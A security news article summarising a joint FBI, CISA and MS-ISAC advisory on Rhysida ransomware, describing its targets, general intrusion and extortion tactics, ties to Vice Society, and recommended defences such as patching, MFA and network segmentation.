FBI, CISA and MS-ISAC warns about Rhysida ransomware operations

New but significant threat of Rhysida ransomware

In recent months, the cybersecurity landscape has been shaken by the emergence of Rhysida ransomware, a malicious software that has aggressively targeted multiple industry sectors since its detection in May 2023. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued a detailed advisory,^[1] alerting organizations about the increasing threat posed by this ransomware variant.

Rhysida first gained public attention following its breach of the Chilean Army,^[2] where it not only encrypted its data but also leaked it online, showcasing its double-extortion technique. Ransomware has been particularly active in critical sectors, such as education and government. The U.S. Department of Health and Human Services (HHS) has also noted Rhysida's significant impact on healthcare organizations.

The security alert of CISA noted:^[3]

Observed as a ransomware-as-a-service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors and any ransom paid is split between the group and affiliates.

Operational tactics of Rhysida

Operating under a ransomware-as-a-service (RaaS) model, Rhysida allows affiliates to use its ransomware tools and infrastructure in exchange for a share of the ransom profits. The Rhysida attackers have demonstrated proficiency in various cyberattack techniques. They exploit vulnerabilities in external-facing remote services like VPNs, particularly targeting organizations that have not enabled Multi-Factor Authentication (MFA). Phishing attacks and exploitation of the Zerologon vulnerability (CVE-2020-1472) are also among their methods to gain and maintain access within networks.

Additionally, Rhysida employs living-off-the-land techniques, such as establishing Remote Desktop Protocol (RDP) connections and using PowerShell for lateral movement. This approach enables the attackers to blend in with normal Windows systems and network activities, making detection more challenging.

Rhysida's encryption method is notably sophisticated, using a 4096-bit RSA encryption key with a ChaCha20 algorithm. Once the data is encrypted, the ransomware modifies file extensions and drops a ransom note, urging victims to pay in Bitcoin. The ransom note, named ‘CriticalBreachDetected,’ directs victims to a Tor-based portal for payment instructions. This approach is part of Rhysida's double extortion tactic, where they demand ransom for decryption and threaten to publish stolen data if their demands are not met.

The Rhysida ransomware has shown overlaps with the Vice Society ransomware group, also known as Storm-0832 or Vanilla Tempest. This association is evident in their similar targeting patterns and the use of specific tools. The shift from Vice Society to Rhysida was noted around July 2023, which coincides with Rhysida starting to list victims on its data leak site.

Mitigation and defense strategies

In the battle against the Rhysida ransomware, adopting effective mitigation and defense strategies is crucial. A primary focus for organizations should be on addressing and rectifying vulnerabilities that are already known to be exploited. This proactive patching can significantly reduce the risk of a Rhysida attack.

A key defensive measure is the implementation of multifactor authentication (MFA) across all organizational services, with special emphasis on critical areas such as webmail, VPNs, and accounts that have access to essential systems. MFA adds an additional layer of security, making it more challenging for attackers to gain unauthorized access.

Another vital strategy is the segmentation of networks. This approach involves dividing the network into separate, secure sections to limit the spread of ransomware within the organization. By compartmentalizing the network, it becomes more difficult for Rhysida to move laterally and infect multiple systems, thereby containing the potential damage and impact of an attack.